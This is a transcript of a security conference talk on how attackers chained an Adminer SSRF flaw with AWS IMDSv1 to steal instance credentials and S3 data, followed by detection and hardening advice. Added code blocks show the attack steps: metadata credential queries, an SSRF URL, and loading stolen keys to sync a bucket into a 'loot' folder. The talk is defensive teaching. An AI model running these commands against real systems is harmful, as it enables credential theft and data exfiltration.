Transcript
This transcript was autogenerated. To make changes, submit a PR.
I always say it's hard to follow a tough act, but no
act is tougher than lunch. But I'll do my best.
And one thing is, we want to make sure that, as with any speaker, you're leaving this session with a new nugget
of information. A little bit about today's talk: we're going to be talking about the cloud metadata service
and the abuses we're seeing on the front lines from different threat actors,
and we're going to speak in particular about one use case.
So, quickly: we'll give some small introductions of ourselves
and a little overview of what the instance metadata service is.
We're going to talk about that across the three major cloud
platforms, AWS, GCP, and Azure, but then we're
going to really focus on AWS towards the end. We're then going to speak a
little bit about the threat landscape: what we're seeing being abused,
or what can be abused, by threat actors around the cloud metadata service.
Then we're going to get into the specific use
case where we saw threat actors able to
abuse this at a grand scale, and go
through the timeline of the attack. Towards the
end we're going to do a demo of exactly
what the threat actors did and utilized in order to perform
this attack. Then we're going to cover
detections: how to detect this in your environment, how to
remediate, how to prevent. And finally we're going
to run that same demo to show that the prevention techniques were
able to successfully block the specific attack.
We tried to plan ahead.
The demo gods aren't always working in people's favor,
so we recorded video demos, which we'll talk through.
As always, this is more of a housekeeping item: the case
studies and examples that we're going to be talking about are really
drawn from various different attacks and things that we've
seen on the front lines that are public knowledge, and from our
proactive-type engagements. There's not one specific client we're
speaking of, because we want to obfuscate as
much as possible to keep our clients' confidentiality intact.
So a little bit about myself. I'm Nader Zaveri.
I'm a senior manager within Mandiant, specifically part of
our security transformation services practice. Say that
three times fast, I dare you. It's a very unique practice, though.
So within Mandiant, as we know, we have the
incident response services, which is the foremost
service that we provide; we're the containment and remediation arm
during an incident. So as investigators like Brandon
and his team are investigating, we're there to help plug the holes
that the attackers were able to utilize, and also help remediate
additional holes and gaps that the attacker may try to pivot through.
Another facet of what we do here at STS
is proactive engagements. So throughout the talk, you're going to hear
me talk about things that I've seen on the front lines as well as from organizations
that are being proactive. They want to be able to test and assess
their cloud environment, so they call us and we perform proactive
engagements and assessments across their environment, regardless of
the cloud platform.
And my name is Brandon Sean Ruffer. I am a principal consultant
with the Mandiant services team, focusing on incident response
and digital forensics. My focus is similar
to Nader's in that when an incident occurs,
we're those individuals that are on the front lines responding to breaches,
as well as performing some of the behind-the-scenes activities
when it comes to figuring out what actually occurred, recreating it,
and following the breadcrumbs of the overall incident.
I have a degree in digital forensics,
and I've responded to both ransomware and nation-state threat actors over the years.
In my free time, or the lack thereof,
I also provide industry advisory to other organizations,
and I am an instructor for our incident
response and other related course content.
I also manage a team of individuals in
our San Francisco office, but I recently moved to Arizona, and
it's been an interesting transition between the
general teams at Mandiant.
Awesome. So first, before we break into
exactly what happened, we want to level-set the terminology.
When we're talking about the instance metadata service, what do we mean?
What is instance metadata? What is it in relation to AWS?
Really, this exists across cloud platforms. One thing is,
it provides critical information. So if you have a
virtual machine in the cloud, or an EC2 instance
in this case with AWS, it's
set up on a non-routable, link-local IP
address, 169.254.169.254.
You can do a simple curl command, and it provides
critical information about the operating system:
IP address, what subnet it's in, what availability zone —
some of the key things that an application may
need. So sometimes a developer needs this to be able to provide
critical information. But you can also supply
certain scripts, like startup scripts within the user data,
for the virtual machine to run. And one
of the things is, this really exists across cloud platforms;
we're speaking a little more deeply on AWS,
but Azure has its instance metadata service, as does GCP.
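As a quick sketch of what a developer (or attacker) on the box would actually run — these are the standard IMDSv1 paths, and the values returned depend on the instance:

```bash
# IMDSv1: plain GET requests to the link-local address, no token needed
curl http://169.254.169.254/latest/meta-data/                      # list available categories
curl http://169.254.169.254/latest/meta-data/instance-id           # e.g. i-0abc... (placeholder)
curl http://169.254.169.254/latest/meta-data/local-ipv4            # the instance's private IP
curl http://169.254.169.254/latest/meta-data/placement/availability-zone
```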
Now we know a little bit about what the instance metadata service is.
Why do we care? We'll be talking a
little more about the AWS instance metadata service,
version one versus version two.
One thing is, this is not a vulnerability. It is a misconfiguration,
so it's not going to be caught by normal vulnerability scanners.
It is a misconfiguration; it is meant
to behave like this. And one thing,
just anecdotally — and I'm glad this just came
out about a week and a half ago from Datadog —
they went and scoured 600-plus
organizations for this specific
misconfiguration, which is version one, and we'll talk a little bit about what
happens in version one versus version two. 93%
of EC2 instances had
this misconfiguration, and 95% of
organizations across their span of 600-plus organizations
had at least one or more such instances. And this
is something that anecdotally I can speak to just from doing hundreds
of IRs and proactive assessments. This is
a common finding we see across
the different AWS environments:
this specific configuration is turned on.
It's not turned off by default; it's turned on by
default — IMDSv1. And when you look at the
configuration of an EC2 instance, for example,
you'll see the HTTP token setting
set to optional. We will talk about what happens when you set it to required
and what it stops.
One thing is, this is not something new, right? IMDSv1 abuse
is not something new. This happened in the Capital One breach,
the very infamous Capital One breach that we are all well aware
of. The threat actors utilized this
attack in 2019, and by the November–December
2019 time period, AWS was able to create
version two. But version one is not turned off by default,
so the majority of organizations that we've seen still have this
misconfiguration.
One thing, as I mentioned, is that as this instance metadata service is being utilized,
there are things like a user data script you can load as
you launch an EC2 instance — similar to, if you recall
your Windows days, the logon script that can allow for
mapping of drives. A lot of times those
user data scripts, from what we've seen through our various
IRs, have cleartext passwords.
If there's a password and they're utilizing PowerShell or
Bash, you can see the password in clear text.
So if a threat actor has the ability to query this
from the outside, or the ability to get access
to the EC2 instance, and they query the user data scripts
through the instance metadata service, they'll be able to obtain those passwords.
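As a rough illustration of that exposure — the user-data path is standard, but the bootstrap script and password below are made up for this sketch:

```bash
# User data is served by the same link-local metadata service
curl http://169.254.169.254/latest/user-data
# A risky bootstrap script might come back looking something like this (hypothetical):
#   #!/bin/bash
#   mount -t cifs //fileserver/share /mnt/data -o username=svc_app,password=SuperSecret123
```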
And this problem, this misconfiguration,
gets really exacerbated once you have a vulnerable
application with an SSRF —
a server-side request forgery vulnerability — which takes this misconfiguration and
expands it out even further because
of the ability to query it from the outside. And Brandon will
talk a little bit about what exactly we saw and how
a threat actor was able to utilize this to query
things from the outside without being inside
the actual instance. Because remember, this is a link-local
IP address; it's non-routable.
The only way this can happen from the outside is through an
SSRF vulnerability.
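Conceptually, the SSRF path looks something like the sketch below — the vulnerable application and its `url` parameter are made up here; the point is that the web server, not the attacker, fetches the link-local address:

```bash
# The attacker never reaches 169.254.169.254 directly; the vulnerable app does it for them.
curl "https://victim-app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# With IMDSv1, the response names the attached role; a follow-up request to
# .../security-credentials/<RoleName> returns temporary keys and a session token.
```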
And one thing we really wanted to discuss — one of the reasons we put this together — is that once
this came up, we went through the whole process and realized
that this may be a first. We talked internally with threat intel,
and I talked to various contacts in other cloud security communities, and this
may have been the first time we've seen a threat actor take
a specific misconfiguration
across an entire set of IP CIDR
ranges against a cloud provider. So they had a misconfiguration,
they knew they had an SSRF-vulnerable application,
and they essentially sprayed and prayed across a set —
I think we have over 2,100 IPs this specific threat actor was spraying.
And Brandon
will talk a little bit more about what exactly we saw from a forensic standpoint
and what exactly happened.
Great, thanks Nader. Yeah, definitely. This is pretty unique
in general, across the board, that we've seen a threat actor
target really all IP ranges related to
hosted infrastructure, in particular AWS.
We've seen the threat actor also scan other resources for
similar misconfigurations in other cloud-hosted
services; we'll definitely talk through some of those. But in particular,
cloud-hosted services are a rather
attractive target for similar threat actors,
just in general, because of the proliferation of
cloud-hosted resources and the available information,
including things like configurations and topology,
and, most predominantly in this particular case, credential information
that was leveraged to further the attack that
they were able to carry out. We will cover a
demo of what we saw in this particular case,
but related to the actual infrastructure, this was especially
challenging because the amount of log data that was actually
recorded was rather minimal in comparison to
other locally hosted platforms or things
that in general would have
more verbose logging out of the box.
The other thing in particular we saw of UNC2903 was exploitation
and targeting of other services and applications
that were hosted in the AWS IP address range
space, and then further abuse of IMDSv1.
And as Nader mentioned, not only is this
a misconfiguration, but the fact that it's on hosted infrastructure in
the cloud makes it easy to identify external applications, so that
if a CVE is released, attackers can obtain information to
further an attack, or use things like remote code execution
to obtain temporary access keys and credentials.
The other thing as well is that in this particular case it was
limited to a single system that had been inadvertently
opened to the Internet. However,
with the roles that are assigned to VMs,
sometimes there are configurations which allow
a role not only on one VM but on multiple VMs.
So narrowing down where credential
exposure might have occurred definitely gets more complicated,
as there are other access rules and keys that share the same permissions
and might have access to a particular S3
bucket or some other resource that is used to store data.
And as I said, activity expands over all
industry verticals for a cloud hosting platform. So this isn't limited
to just AWS; there are existing and similar
threats in AWS and GCP,
as well as Azure, which host similar metadata services.
Yeah, and one thing to note — I think Brandon mentioned
this — we aren't specifically talking about the
CVE, the vulnerability that the threat actors utilized,
which was an SSRF vulnerability within an
application, because we're trying to nip it in the bud.
If we patch this one application,
a new SSRF will come about. We're looking specifically at the misconfiguration
of this metadata service and focusing on that, because that is
the root of the problem. As you'll see during
our talk, when we go through the remediation
methods, you will see us remediate,
turn on IMDS version two, and stop
this type of attack. So this is why our talk is really focusing
mainly on the misconfiguration,
the setting, as opposed to just a CVE,
because this CVE is here today, another one's going
to be here tomorrow, and we're really trying to focus on how to
remediate this head-on.
And as we mentioned, we're going to focus a little bit on AWS, but this spans
different platforms. Azure has its metadata
service, and Azure does it very well, specifically because they require
the Metadata tag to be
added as a header on the request. Also, any time they
see something like an X-Forwarded-For header, they will automatically
reject it. The X-Forwarded-For check is really key, because it indicates
whether something is coming from a relay server or proxy,
and if so they will automatically block it. And it requires
an OAuth token in
order for you to query the metadata service. But even
then, there are some great articles around how you
could use Azure managed identities as
a way to abuse and proliferate;
there are some great articles from Carl and Marius on
different ways of using Azure managed identities to abuse
Azure by utilizing the metadata service.
Google Cloud is similar. As I mentioned, they require
a header, Metadata-Flavor; the header must
be Metadata-Flavor: Google, and they also block
X-Forwarded-For messages, so they do that same thing.
But this wasn't always the case. The older versions,
v0.1 or v1beta1 from
maybe a few years back, didn't require that
header to be there, which then allowed, let's say, a similar
type of attack — an SSRF-type attack — to occur, but those are
no longer supported. So now it's only v1, which blocks
that capability. But even then, as I mentioned, there are ways you could
query the metadata service once you do have access to
the instance to be able to get
all the metadata, and sometimes add SSH keys at the project
level. Some of the articles that talk
about this — Matiga recently did, as well as
Ancat, which is a great website for a lot of cloud
pen testing — cover how you could query
the metadata, get your SSH keys, and put them at the project level,
not just at the instance level. The whole
point is we want to show that this cloud metadata abuse can occur
across cloud platforms. But this specific case,
because IMDSv1 requires neither the header
nor the X-Forwarded-For rejection, allows for
the proliferation and makes the scope as large
as possible.
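For reference, those header requirements look like this on the two platforms (standard documented endpoints, run from inside a VM); requests without the expected header are rejected:

```bash
# Azure IMDS: the Metadata header is mandatory, and proxied (X-Forwarded-For) requests are rejected
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# GCP: the Metadata-Flavor header is mandatory on the v1 endpoint
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/"
```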
One thing that was notable as well is how
long similar metadata services have existed.
I think Nader had given an example:
even GCP has had configurations
for using metadata since back in 2017, and
there have been people who attempted to abuse
that, even if only in a testing form.
Similarly, the other example Nader had given was
the Capital One event, where there obviously
was usage of similar metadata services and abuse of the related credentials.
Then, more recently, in
February of 2021, there was a
CVE announced for a piece of
database management software
called Adminer, which allowed the
use of a server-side request forgery,
which the threat actors then chained for their purposes.
With the understanding of the metadata service
existing in the AWS cloud, they were able to
obtain proof-of-concept code which had been
released. Essentially we have circumstantial
evidence that that proof of concept was utilized to then perform
this particular attack; it was available pretty quickly,
and using various open source and Google searches it is
easy enough to find the CVE and then abuse it
across the platform. Within three months,
we saw the usage of this
particular CVE along with the proof of concept — which we'll show you in
a demo — to automate the identification
of vulnerable versions of the Adminer software on the web
platform itself. We then saw
the retrieval of the EC2 instance roles, and then
the acquisition of the credentials to subsequently
use in the attack. From there they
utilized the key credentials to log in with the
AWS command line, conduct reconnaissance of the available
data in the S3 bucket that the keys had access to, and then
perform data theft from the available bucket.
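That credential-theft step maps onto the standard IMDSv1 role-credential paths — sketched here with a placeholder role name; in the attack these URLs were fetched by the vulnerable server via the SSRF rather than directly:

```bash
# 1. List the IAM role(s) attached to the instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# -> e.g. "WebAppS3Role" (placeholder name)

# 2. Retrieve the temporary credentials for that role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/WebAppS3Role
# -> JSON with AccessKeyId, SecretAccessKey, Token, and Expiration
```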
The thing that's interesting as well is that
once they obtained the keys and the temporary access credentials,
that was when some of the alerting went off, which we'll talk about in
a later slide. But in general, the threat
actors in this particular case moved fast — not only from the
initial release of the proof of concept,
but even on the day in June when the attack occurred,
we saw the reconnaissance and then data theft within, I believe,
three hours of the attack itself. So, moving rather
quickly. Yeah, that's a great point: as soon
as they were able to obtain credentials, we saw them in the
environment fairly quickly. And another thing to mention,
as I've said a few times, is that this is one CVE
that was created, and the POC was out there. And the
thing is, there's only so much you can stay ahead of on vulnerabilities.
I have just a little story where a
vulnerability was disclosed on October
21st. Days later, a POC,
a proof of concept, came out on the Internet, on the 27th.
By the 28th, the client that we were doing
the IR for was breached with that same proof of concept.
So there's only so much you can be ahead of these vulnerabilities.
This is why we really want to focus on the configurations and settings.
One thing I will say, just as a suggestion: when you are doing your vulnerability
scanning, you're seeing a lot of vulnerabilities that
come out of whatever Nessus scan or
other vulnerability scanning software you're utilizing.
One thing to help prioritize is whether a POC is out there.
If a proof of concept has been published, that is something you want
to definitely get ahead of and try to patch right away. And you'll
notice as well, CISA doesn't always
publish bulletins for every vulnerability
out there. But once you see a proof of concept out there for
something that's Internet accessible, you'll see a bulletin come out right away
for that. So part of staying
on top of your threat and vulnerability management is trying to figure
out if those are out there. That's something any script
kiddie can grab off GitHub and use, and we have
some circumstantial evidence that the POC that was utilized
was the same one that was found in
this particular case.
The way the demo is going to work is very similar to what we believe the threat actors had performed
prior to this stage, leading up to what we're going
to show in the demo. Basically, we saw the threat actors scan
the web application and then subsequently
perform the attack. The fact that the infrastructure was
hosted in AWS is obviously one of the key
factors in this particular case. But in
general, across our client base, once we were able to obtain some of the IP
addresses that we identified as related to the threat actor's activity,
we saw that there were other similar characteristics
that our threat intelligence team was able to match on — I believe 2,100
IP addresses that had scanned for similar vulnerabilities around
the same time. So, kind of an interesting tidbit of information there.
But the way the attack works is somewhat
counterintuitive from an investigative standpoint as well,
because there is not really command and control traffic;
instead there's an operational relay box, which is essentially
the attacker's command and control system.
They took the proof-of-concept code that was released,
ran it on their local system, and
then navigated to the vulnerable Adminer page.
We'll show you the demo of this in a couple of seconds here. But once
they navigated to the Adminer page and had the code running on their own
box, they typed in the IP address and port,
which subsequently returned the credentials, as shown
in step three. Once they had the credentials themselves,
they basically no longer needed the infrastructure hosted on their command and control
operational relay box, and they also didn't
need access to the front end of the application anymore. They were able to log
in, utilize the keys, and then exfiltrate the
data from the S3 bucket itself. So, a pretty quick
attack. And I believe in the upcoming slide we have a quick demo.
Yes. So we're going to do the demo with,
of course, IMDSv1 enabled. We're going to walk through this demo
with infrastructure in place that mirrors what we saw the
attacker utilize. And you'll see very quickly, as mentioned, that with
the Adminer tool all they needed was an IP
address and a port — they didn't need a
username, didn't need a password — and you'll see access keys and secret access
keys for that EC2 instance. So
what you'll see is that the script we're going
to run includes a parameter for the port as well as the URI
for the metadata service itself.
Subsequently, we change the IP address to our
attacker's operational relay box, which is the local system in this particular
case, appended by the port; we change the database setting to Elasticsearch,
hit the login button, and then the credentials are returned to the screen.
So, a very simple attack in theory,
but from an investigative standpoint, it's very challenging to
acquire relevant data that actually records
this happening. In general, there are some
commands there to pipe in what the keys and tokens are,
then perform the actual reconnaissance of the buckets and
then download the content — but that's really it at
a high level.
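Those commands amount to loading the stolen temporary credentials into the AWS CLI and then listing and pulling the bucket — roughly like the sketch below, with placeholder values and a made-up bucket name:

```bash
# Export the temporary credentials returned by the metadata service (placeholders)
export AWS_ACCESS_KEY_ID="ASIAEXAMPLEKEYID"
export AWS_SECRET_ACCESS_KEY="wJalrEXAMPLESECRET"
export AWS_SESSION_TOKEN="IQoJbEXAMPLETOKEN"

aws sts get-caller-identity                      # confirm which role the keys belong to
aws s3 ls                                        # reconnaissance: buckets visible to the role
aws s3 sync s3://example-target-bucket ./loot/   # data theft from an accessible bucket
```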
What it includes, you'll see on the web server as well.
On the system itself, you type in the IP address —
the Amazon Web Services address appended with the Adminer path —
and the vulnerable version reaches back out, as a result of the server-side
request forgery, to the command and control operational
relay box hosting the script itself. So in general,
once you obtain the IAM role, it includes
the key and credential information. You can change some of
the settings to obtain the full list of available
roles and then subsequently utilize that
for the attack itself.
And so, now that we know what happened with IMDSv1:
as I mentioned, Amazon came
out with IMDS version two back in November
of 2019, announced it around
re:Invent, and it went live. But,
as we just saw from that data, as well as just anecdotally,
we still see version one in almost every environment.
So what is different with IMDSv2 versus version
one? Version two is now a session-based protocol,
a session-based model: instead of starting
with a GET request, you make a PUT request to obtain a token,
and from that token you can then start querying the
metadata service. If the request comes from a relay box,
it will fail, because it requires that X-Forwarded-For
not be there. If it sees a packet with an
X-Forwarded-For header, it will block it.
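A minimal sketch of that session-based flow, using the standard IMDSv2 endpoints from inside the instance:

```bash
# Step 1: PUT request to obtain a session token (TTL up to 21600 seconds)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 300")

# Step 2: every metadata request must present that token
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/instance-id

# A plain IMDSv1-style GET with no token is rejected once HttpTokens is set to required
curl -s -o /dev/null -w "%{http_code}\n" http://169.254.169.254/latest/meta-data/instance-id   # 401
```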
And it does require the token header
to be present on each metadata request. They've also added CloudWatch
metrics. So if the metadata service is being utilized
with version one, you'll be able to see that. And I'll talk a little
bit about the different detection techniques internally —
how you can see it — as well as some open source
tools to verify. If you have an organization that runs AWS,
one thing to do today, or Monday, is to
check out your AWS EC2 instances.
There are some native services that you can utilize. AWS
Security Hub now has its own
detection that allows you to see if
an EC2 instance has IMDS version one
enabled. There are specific CloudWatch metrics: as I mentioned,
if IMDS version one is enabled on an EC2 instance or is being
utilized, you'll be able to see that, and there's a Config rule as well —
you can utilize an AWS Config rule to be able to do remediation.
There are open source tools out there too. I'm a
big proponent, especially for the security community, of not
only utilizing native services but, if you need open source
tools, getting great, reputable open
source tools like Prowler or Metabadger, which is
a tool just dedicated to
discovering and remediating
IMDS version one on vulnerable systems.
And of course there's CloudMapper, made by
some great cloud security folks and some of our own cloud security personnel.
And there are always ways to discover it purely through the AWS command
line interface — you can use it to query.
When you go through an EC2
describe-instances query, you'll be able to see what we're
going to talk about in a little bit: the HTTP token option being
set to optional in the beginning, and once we set it to required,
you will see the difference in the output.
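A small sketch of that check with the AWS CLI — the instance ID is a placeholder:

```bash
# Show the metadata options for one instance; HttpTokens "optional" means IMDSv1 is still allowed
aws ec2 describe-instances --instance-ids i-0123456789abcdef0 \
  --query "Reservations[].Instances[].MetadataOptions"

# Or sweep a region for any instance still accepting IMDSv1
aws ec2 describe-instances \
  --query "Reservations[].Instances[?MetadataOptions.HttpTokens=='optional'].InstanceId" \
  --output text
```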
So, a little bit about detection.
In general, this particular type of
attack is pretty challenging to investigate, even though
we were able to demonstrate the actual event quickly.
It really doesn't generate many logs,
in a couple of similar events that we've had.
The main thing we had to key on, as to whether
or not exfiltration had occurred of either the credential itself
or the bucket contents, was GuardDuty.
In some of our testing
we found that by the time it alerts, either the data has already been taken,
or the key itself — the credential
from the role — has already been taken.
You'll see that there are really two primary alerts for the credential
theft itself: instance credential exfiltration
inside the AWS environment, and instance credential exfiltration
outside of it.
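If I recall the finding type names correctly (worth confirming against the current GuardDuty documentation), you can hunt for them with something like:

```bash
# Look up GuardDuty findings for instance-credential exfiltration
DETECTOR_ID=$(aws guardduty list-detectors --query "DetectorIds[0]" --output text)

aws guardduty list-findings --detector-id "$DETECTOR_ID" \
  --finding-criteria '{"Criterion":{"type":{"Eq":[
    "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
    "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"]}}}'
```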
In particular, it is incredibly challenging in some cases to
figure out what the alert means, because
the logging from the metadata service itself, at least for AWS, is rather
sparse and limited. There is,
in general, some logging which shows the subsequent
malicious usage of the credential. But for
the instance metadata service itself, because of the way that
it uses the link-local address, there's not
an HTTP log which records illegitimate
or even legitimate requests for the tokens
themselves. So because of the
server-side request forgery, with the system querying the metadata
service as if the request were local,
there's limited data that's recorded by the
actual metadata service. And I don't believe there's anything that
can really increase the verbosity of the logging
for the metadata piece itself.
The other thing that was challenging was the available VPC
flow logs. What we saw was that once the threat
actors performed this particular attack, there was
an anomaly in the network traffic: we saw a web request which looked like it failed —
and I'll explain that in a couple of seconds. But alongside the failure
in the web log itself, we saw traffic outbound
from the EC2 instance, which was an anomaly,
because we were asking why the EC2 instance was reaching out
to the Internet. In the logs
we ended up seeing a 302 redirect and a 403
error message, which as an investigator kind
of threw us off as to why the application was erroring out —
you would assume that was a failure —
but the failures were relevant. We matched that up from
a timeline perspective with the VPC flow logs, because we were able
to see the outbound traffic, and
based on the web request itself,
which included an unknown IP address and a port number,
plus the outbound VPC flow logs, we concluded there was something else going on
from a vulnerability standpoint. And then, subsequently,
the timing aligned very well with the object-level access logs
and data events, where we could see the copying of the data
using the AWS command line in subsequent actions.
And one thing to mention — I think Brandon talked about this — is that
there's a delay from the time of exfiltration
before the alert. We're using demo-sized amounts
of data exfiltration here, but
there is just a delay in general. And also, it's an
alert, right? It's not a prevention. And actually, just
yesterday it came out that if you utilize Amazon
Detective, it can now group your GuardDuty
alerts and your VPC flow logs — that just came out last night.
I think I just tweeted about that. I'm not just trying to plug my Twitter;
it really did just come out last night that you can now
group your GuardDuty alerts with your VPC flow logs and
stack them up for easier triaging. And that just came out with Detective
last night. So there are strides happening from
the AWS standpoint. But one thing is:
okay, we've discovered it, we've detected it — how can we remediate it?
remediate it? There's a few ways to remediate.
Do you even need this instance metadata service?
There's many times and majority of the time you don't
need the instance metadata service unless your application or
your team needs it for a specific reason. From getting
the IP address, the availability zone,
the subnet, you can disable that entire instance
metadata service at once. As you're
going through the EC two metadata option,
you put an HTTP endpoint,
put false or disabled and you'll be able to block
the ability for even anyone to utilize that if
it's needed. Right? So you talk to your team, they've said no, we need
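Both options are one-line changes with the AWS CLI — the instance ID here is a placeholder:

```bash
# Option A: turn the metadata endpoint off entirely if nothing needs it
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 --http-endpoint disabled

# Option B: keep the service but require IMDSv2 session tokens
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 --http-tokens required --http-endpoint enabled
```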
If it is needed, right — so you talk to your team and they say, no, we need
this because we do X, Y, and Z — you can then restrict who
can utilize it. You can do it at the iptables level, where you
can say only a specific user, say Bob, can query that IP
address, and block it for everyone else. And you can also just utilize
open source tools. If you've talked to your team and realized you don't really need
this at all, there are tools that will go through the entire
list for you. Metabadger, which I talked about already, is an open source
tool that goes through all your instances, discovers them, and, if they
are vulnerable, remediates them in a single stroke. So now that we've remediated
it, how can we prevent it from happening again? After we're done remediating,
I don't want to talk about IMDSv1
again, because it's just not something I, as an
information security officer, want to consistently worry about.
You can do this in many different ways. There are SCPs —
service control policies — where you can say that only
EC2 instances with version two required
can exist in your
environment; you limit your environment to
IMDSv2 only.
So if you were to create an EC2 instance with version
one, without requiring version two,
it will
not allow you to create that EC2 instance.
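A sketch of what such an SCP could look like — the policy name and file are illustrative; the `ec2:MetadataHttpTokens` condition key is the relevant control:

```bash
# Deny launching any EC2 instance whose metadata options do not require IMDSv2 tokens
cat > require-imdsv2-scp.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "RequireImdsV2",
    "Effect": "Deny",
    "Action": "ec2:RunInstances",
    "Resource": "arn:aws:ec2:*:*:instance/*",
    "Condition": { "StringNotEquals": { "ec2:MetadataHttpTokens": "required" } }
  }]
}
EOF
# Then attach it through AWS Organizations, e.g.:
# aws organizations create-policy --name RequireImdsV2 --type SERVICE_CONTROL_POLICY \
#   --content file://require-imdsv2-scp.json
```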
There are also infrastructure-as-code methodologies. If you are not doing it through the
console — and the preferred method is
always to push infrastructure as code; we don't want a lot of people having
their hands in the cookie jar in terms of being able to make modifications
to your environment — you utilize infrastructure as code, CloudFormation or
Terraform, and there are Terraform and CloudFormation techniques
to be able to block it. And then you can utilize local IAM policies:
if you have one AWS account and are not using AWS Organizations,
you don't want to use SCPs, but you can
block users from launching any EC2 instance
that does not have version two required.
And there are some additional prevention techniques. So let's say you have to have it — we have to
have Bob, who has the ability to query it.
There are ways you still want to harden it. As I mentioned, user data scripts —
that launch script that runs initially when an EC2 instance
is created and launched —
you want to make sure you're going through those scripts
and ensuring there are no cleartext passwords; there are open source tools
like ScoutSuite that can catch that for you.
You want to limit the number of HTTP hops,
so it's not going through a relay server. You can limit it to one:
you can go from one all the way to 64, but you
can say, I only want it to go through one hop, so it's not going
through, let's say, the relay server that may have caused
this to happen. And you can limit who can
utilize it, as I mentioned, through an IAM policy,
and also who can modify the IMDS
version one and two settings. You can do that at the IAM level as well.
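Two of those hardening steps sketched with the CLI — the instance ID is a placeholder, and the grep is only a crude illustration of auditing user data for secrets:

```bash
# Limit metadata responses to a single network hop so proxied or relayed requests fail
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 --http-put-response-hop-limit 1

# Pull the user data script and check it for embedded credentials
aws ec2 describe-instance-attribute --instance-id i-0123456789abcdef0 \
  --attribute userData --query "UserData.Value" --output text | base64 -d | grep -iE 'pass|secret|key'
```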
So, demo number two. We did some magic in the back and turned it on —
version two is now enabled — and Brandon's going to walk through what happens after
that. So, very similarly,
we run the command to include the port number as
well as the metadata service itself on the
operational relay box. Once that
runs and is operational on the actual system itself,
we change the setting to Elasticsearch and then change the
source IP address and port. And basically
it errors out instead of returning the credentials to the screen.
That's because of the PUT request — there are two pieces, obviously,
once IMDSv2 is enabled. One is the PUT request to
basically authorize the request, and then an additional request to obtain the
credentials themselves. And in
general, this is the mitigation, at least if
there are Internet-facing systems or similar infrastructure
set up in AWS — at least one way to remediate
the overall event. Awesome.
So as you can see, it's unauthorized — a 401 unauthorized attempt.
As Brandon mentioned, it requires a PUT request to get the session token to
then be able to query. Because this request doesn't have that —
it's coming from a relay box, it doesn't truly have access internally to the
EC2 instance — we aren't able to get the credentials.
So, really, the action item for everyone at the end of this session is:
go to your teams. If you have an AWS instance, if you
have AWS in your environment, ask, do we have
any IMDS version one enabled? If the answer is "I don't know,"
then here are a few things. And it actually goes straight into our
next slide. We put out a blog a few months back, with
the help of some others within our team and threat intel,
where we walk through the entire process of the threat actors, but also
the specific mitigations. It's about ten-plus pages
of detection techniques, prevention and mitigation,
and remediation techniques. So go to your teams,
say, if we have IMDSv1 enabled, I want to know how many we
have and whether we need it or not, and be able
to remediate that as soon as possible. And that
concludes our session, if there are any questions.
I guess one more closing thought as
well: depending on the actual vulnerability
scanner or anything like that, this is obviously not a vulnerability,
it's a misconfiguration, which is one of the key pieces I think we're trying
to get the teams to take away with them.
There might be something that is low priority
or low risk if it's an internal system or doesn't
necessarily have Internet accessibility, but that, paired with the fact that there was
a vulnerability on this server, makes this
a little bit more of a challenge not only to respond to,
but to figure out how to remediate and make
the system hardened and more secure, because the attack
itself is rather simple and was carried out rather rapidly.
And unfortunately, there are a couple of clients that ended up in
a similar boat, where it was too late — the identification came
after the exfiltration had occurred. Yes, that's a great
point. A vulnerability scanner will not catch this.
This is where you need to expand beyond your vulnerability scanners to something like
attack surface management, which can catch major misconfigurations
that it sees from the outside —
an ASM that can catch these misconfigurations and
notify the team that you do have
EC2 instances that have version one enabled. Great point,
Robert. All right, thank you guys.
That was great. If you guys have any questions for Brandon
or Nader, they will be outside those doors to
my right, your left, in about five minutes, and they'll be
there for about ten or fifteen minutes if you want to chat.
We'll be back here at 2:45, I believe, in about
fifteen minutes. Give it up again for Brandon and Nader.
Thank you.